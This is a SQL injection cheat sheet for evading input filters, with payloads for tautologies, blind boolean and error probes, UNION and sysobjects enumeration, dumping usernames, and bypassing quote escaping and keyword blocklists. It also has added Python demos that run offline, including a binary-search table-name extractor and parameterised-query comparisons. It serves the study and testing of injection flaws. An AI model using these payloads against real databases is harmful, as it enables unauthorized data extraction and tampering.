ANKUSH
By Ankush kumar

Note from the author: If you don't know how SQL Injection works, this page probably won't help you. This page is for people who already understand the basics of SQL Injection attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate SQL Injection vectors or how to write the data dumping or DB tampering portion of the attack. It will simply show the underlying methodology and you can infer the rest. This document was built with similar structure to my XSS Cheat Sheet to aid researchers with precise and helpful information. Because this is a living document I suggest you continue to use this site to stay up to date.

I am in need of more versions of different databases. If you have access to a database that is not mentioned below and want to contribute, please email me. If you have an RSS reader feel free to subscribe to my very low volume SQL Injection RSS feed below:

SQL Injection:
Normal SQL Injection:
1 OR 1=1
Database support: [mySQL]

Normal SQL Injection when the value is wrapped in single quotes (the injected quote closes the string and the trailing fragment reopens it so the query stays syntactically valid):
1' OR '1'='1
Database support: [mySQL]

Throwing a syntax error to check whether quotes are being escaped. If the stray quote reaches the database unescaped, the query fails and the application's error page (or a changed response) shows that it is not handling quotes correctly:
1'1
Database support: [mySQL]

Blind SQL Injection creating an error using EXEC. This is SQL Server syntax: SP_ is the prefix of the system stored procedures and XP_ the prefix of the extended stored procedures, and the unfinished EXEC is a syntax error that confirms the input reaches the query:
1 EXEC SP_ (or EXEC XP_)
Database support: [SQL Server]

Blind SQL Injection detection. If the input is being filtered or bound as data, appending AND 1=1 changes the request and should change the result; if the application is vulnerable, 1 AND 1=1 returns exactly the same page as a plain 1, and swapping in 1 AND 1=2 returns a different one. Comparing those three responses is the whole test:
1 AND 1=1
Database support: [mySQL]
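The entries above can be tried offline. The following is an added example, not code from the original cheat sheet: a small SQLite-backed lookup that builds its query by string concatenation (with an optional quoted-value mode for the encapsulated case), the boolean 1=1 / 1=2 detection run against it, and the same lookup with a bound parameter for comparison. The table and rows are constructed for the demo.

```python
"""Added example: a deliberately vulnerable lookup, the boolean detection
check from the cheat sheet, and a parameterised version of the same query.
Schema and rows are constructed sample data."""
import sqlite3

# Constructed sample data: one row is not public and should never be shown.
ROWS = [(1, "anvil", 1), (2, "rope", 1), (3, "dynamite", 0)]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, public INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_input: str, quoted: bool = False):
    """Query built by concatenation. `quoted` mimics an application that wraps
    the value in single quotes (the 'encapsulated data' case) but does not
    escape it. AND binds tighter than OR, so `1 OR 1=1` defeats the
    `public = 1` restriction as well as the id match."""
    value = f"'{user_input}'" if quoted else user_input
    sql = f"SELECT id, name FROM products WHERE public = 1 AND id = {value}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input: str):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = "SELECT id, name FROM products WHERE public = 1 AND id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def raises_syntax_error(conn, user_input: str, quoted: bool = False) -> bool:
    """True when the payload breaks the query (the 1'1 probe)."""
    try:
        lookup_vulnerable(conn, user_input, quoted)
    except sqlite3.OperationalError:
        return True
    return False


def looks_injectable(conn, base: str) -> bool:
    """Boolean-based detection: a true condition appended to the value must
    leave the result unchanged and a false one must change it."""
    plain = lookup_vulnerable(conn, base)
    true_case = lookup_vulnerable(conn, f"{base} AND 1=1")
    false_case = lookup_vulnerable(conn, f"{base} AND 1=2")
    return plain == true_case and plain != false_case


if __name__ == "__main__":
    db = make_db()
    print("1        ->", lookup_vulnerable(db, "1"))
    print("1 OR 1=1 ->", lookup_vulnerable(db, "1 OR 1=1"))
    print("quoted   ->", lookup_vulnerable(db, "1' OR '1'='1", quoted=True))
    print("1'1 errors:", raises_syntax_error(db, "1'1", quoted=True))
    print("injectable:", looks_injectable(db, "1"))
    print("bound    ->", lookup_parameterized(db, "1 OR 1=1"))
```

The bound-parameter version returns nothing for `1 OR 1=1` because the whole string is compared as a value against the integer column; that difference in behaviour is exactly what the 1=1 / 1=2 comparison detects from the outside.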

Blind SQL Injection to locate table names by brute force, iterating through candidate names (substitute each guess for tablenames; the query only succeeds when the table exists):
1' AND 1=(SELECT COUNT(*) FROM tablenames); --

Database support: [mySQL]

Using the USER_NAME() function in SQL Server to tell whether the application runs as the database owner (dbo), which is where a sysadmin login such as sa lands when it connects to a database:
1 AND USER_NAME() = 'dbo'
Database support: [SQL Server]

Evading quote escaping with backslashes. This works against a filter that neutralises a single quote only by doubling it (' becomes '') and leaves backslashes alone: the filter turns \' into \'', MySQL reads \' as an escaped quote inside the string and the second ' closes the string, so the rest of the payload runs as SQL. Escaping functions that also escape the backslash, such as MySQL's mysql_real_escape_string() and Perl DBI's $dbh->quote(), turn \' into \\\' and are not bypassed this way, and the trick depends on MySQL treating backslash as an escape character (the default unless NO_BACKSLASH_ESCAPES is set):
\'; DESC users; --
Database support: [mySQL]

More blind SQL Injection, attempting to create an error using the backslash method seen above (if the trailing 1 ends up outside the string literal, the query fails):
1\'1
Database support: [mySQL]
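To see where the string literal actually ends after each kind of filter, here is an added example (not the cheat sheet's own code) that emulates MySQL's rules for single-quoted literals under the default sql_mode: backslash escapes the next character and a doubled quote is an escaped quote. Two filters are modelled, one that only doubles quotes and one that, in the style of mysql_real_escape_string(), escapes backslashes as well; the query template and the table name are constructed for the demo.

```python
"""Added example: trace the backslash bypass against a quote-doubling filter
and against a backslash-aware escaper, using a minimal emulation of how
MySQL lexes a single-quoted string literal (default sql_mode, i.e. backslash
escapes are active)."""


def double_quotes(value: str) -> str:
    """Weak filter: doubles single quotes, ignores backslashes."""
    return value.replace("'", "''")


def escape_mysql_style(value: str) -> str:
    """Backslash-aware escaping in the style of mysql_real_escape_string():
    escape backslashes first, then single quotes."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def literal_end(sql: str, start: int) -> int:
    """Index just past the single-quoted literal that opens at sql[start].
    A backslash skips the next character, '' is an escaped quote, any other
    lone quote closes the literal. Returns -1 if it never closes."""
    assert sql[start] == "'"
    i = start + 1
    while i < len(sql):
        c = sql[i]
        if c == "\\":
            i += 2
        elif c == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2
            else:
                return i + 1
        else:
            i += 1
    return -1


# Constructed query template: the application drops the filtered value
# between the quotes.
TEMPLATE = "SELECT * FROM users WHERE name = '{}'"


def injected_tail(filtered: str, template: str = TEMPLATE) -> str:
    """Everything that follows the user-controlled literal once MySQL has
    lexed it. Empty string means the literal absorbed the whole input and
    the query is the one the developer wrote; anything else reached the
    parser as SQL."""
    sql = template.format(filtered)
    start = sql.index("'")
    end = literal_end(sql, start)
    if end == -1:
        return "<unterminated literal: syntax error>"
    return sql[end:]


if __name__ == "__main__":
    for label, flt in (("double quotes", double_quotes),
                       ("escape backslash+quote", escape_mysql_style)):
        for payload in ("' OR 1=1 --", "\\'; DESC users; --", "1\\'1"):
            print(f"{label:24} {payload!r:24} -> {injected_tail(flt(payload))!r}")
```

Against the quote-doubling filter, the plain `' OR 1=1 --` payload is contained but `\'; DESC users; --` leaves `; DESC users; --'` outside the literal; the backslash-aware escaper leaves nothing outside it for either payload.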

Creating errors by referencing fake tables. Referencing a table that does not exist forces an error, which helps expose vulnerable applications (try this with and without the quotes):
1' AND non_existant_table = '1
Database support: [mySQL | SQL]

Dumping usernames (assuming there is a username column in the queried table and quotes are not escaped; the conditions are always true, so every row comes back):
' OR username IS NOT NULL OR username = '
Database support: [mySQL | SQL]

Enumerating database table names one character at a time. The comparison answers whether the first character of the first user table's name is above ASCII 116; by changing the 116 you can use logarithmic reduction (a binary search over the ASCII range) to pin the character down in about seven requests. Then increment the first 1 in "1, 1" (the SUBSTRING start position) to recover the second character, and so on until the whole table name is known. Originally found by Kevin Spett:
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Database support: [SQL Server]
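The binary search that the "change the 116" instruction describes, written out as an added example (not part of the original page). The payload builder produces the SQL Server probe above with the position and threshold filled in; the oracle is simulated locally against a constructed table name, and in a real test it would be replaced by a function that sends the payload and returns True when the response matches the "true" page.

```python
"""Added example: recover the first user table's name via the ASCII() > N
probe, one binary search per character. The oracle is simulated against a
constructed name so the example runs offline."""
from typing import Callable

Oracle = Callable[[int, int], bool]   # oracle(position, threshold) -> bool


def payload(position: int, threshold: int) -> str:
    """The cheat sheet's SQL Server probe with position/threshold filled in."""
    return ("1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects "
            f"WHERE xtype='U'), {position}, 1))) > {threshold}")


def recover_char(oracle: Oracle, position: int) -> str:
    """Binary search the ASCII range 0..127 for the character at `position`.
    Past the end of the name SUBSTRING yields '', whose ASCII never compares
    greater than any threshold, so the search converges on 0 and we return
    '' to signal the end. Exactly 7 probes per position."""
    lo, hi = 0, 127                  # invariant: lo <= code <= hi
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(position, mid):    # code > mid
            lo = mid + 1
        else:
            hi = mid
    return chr(lo) if lo else ""


def recover_name(oracle: Oracle, max_len: int = 64) -> str:
    """Walk the positions until the oracle reports the end of the name."""
    chars = []
    for pos in range(1, max_len + 1):
        ch = recover_char(oracle, pos)
        if not ch:
            break
        chars.append(ch)
    return "".join(chars)


def simulated_oracle(hidden_table: str) -> Oracle:
    """Stand-in for the web request: evaluates the probe's comparison against
    a constructed table name, mirroring LOWER() and SUBSTRING(). Counts the
    probes so the cost of the search is visible."""
    lowered = hidden_table.lower()

    def oracle(position: int, threshold: int) -> bool:
        oracle.calls += 1
        if position > len(lowered):
            return False             # SUBSTRING past the end: never "greater"
        return ord(lowered[position - 1]) > threshold

    oracle.calls = 0
    return oracle


if __name__ == "__main__":
    print(payload(1, 116))
    probe = simulated_oracle("Users")    # constructed hidden table name
    print(recover_name(probe), "in", probe.calls, "requests")
```

Each position costs exactly seven probes (the range 0..127 halves seven times), so a five-character name plus the terminating position takes 42 requests instead of up to 128 per character by linear stepping.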

Finding user-created tables using the sysobjects table in SQL Server. The UNION must select as many columns as the original query returns, so adjust the 1,2,3,4,5,6 placeholders until the column counts match:
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Database support: [SQL Server]

Evading keyword filters using inline comments. A filter that looks for the word UNION in the raw input does not see it when a /**/ comment splits the keyword, while the database strips the comment before parsing and runs UNION as normal (the rest of the line is a skeleton to fill in with your own column list, table and condition):
1 UNI/**/ON SELECT ALL FROM WHERE
Database support: [mySQL | SQL]
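An added example (not from the original page) showing both halves of that gap: a keyword blocklist applied to the raw input, and the same blocklist applied after the comments are removed the way the database removes them. The normaliser keeps the contents of MySQL's /*! ... */ executable comments, since MySQL runs those rather than discarding them; the keyword list and sample inputs are constructed for the demo.

```python
"""Added example: a raw keyword blocklist versus one that normalises inline
comments first. /* ... */ outside a string literal is dropped, as both MySQL
and SQL Server do; a MySQL executable comment /*!50000 ... */ keeps its body
because MySQL executes it."""
import re

# Constructed blocklist of the kind a naive filter might use.
KEYWORDS = ("UNION", "SELECT", "DESC", "EXEC")


def naive_blocked(user_input: str) -> bool:
    """Case-insensitive keyword match on the input exactly as received."""
    upper = user_input.upper()
    return any(k in upper for k in KEYWORDS)


def strip_inline_comments(sql: str) -> str:
    """Remove /* ... */ comments outside single-quoted literals. Text inside a
    literal is data and is left untouched. An unterminated comment swallows
    the rest of the input, as it would in the database."""
    out, i, n = [], 0, len(sql)
    in_str = False
    while i < n:
        c = sql[i]
        if in_str:
            out.append(c)
            if c == "'":
                in_str = False
            i += 1
        elif c == "'":
            in_str = True
            out.append(c)
            i += 1
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            body = sql[i + 2:end] if end != -1 else sql[i + 2:]
            if body.startswith("!"):
                # MySQL executable comment: body runs, minus the optional
                # minimum-version number after the '!'.
                out.append(re.sub(r"^!\d*", "", body))
            i = n if end == -1 else end + 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def normalized_blocked(user_input: str) -> bool:
    """Blocklist applied to what the parser will actually see."""
    return naive_blocked(strip_inline_comments(user_input))


if __name__ == "__main__":
    for probe in ("1 UNION SELECT 1", "1 UNI/**/ON SEL/**/ECT 1",
                  "1 /*!50000UNION*/ SELECT 1"):
        print(f"{probe!r:32} raw={naive_blocked(probe)!s:5} "
              f"normalised={normalized_blocked(probe)!s:5} "
              f"parser sees {strip_inline_comments(probe)!r}")
```

The point is not that normalising makes a blocklist safe (casing, whitespace and encoding tricks remain), but that a filter which inspects a different string than the parser does is trivially split.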

ENJOY HACKING(ANKUSH)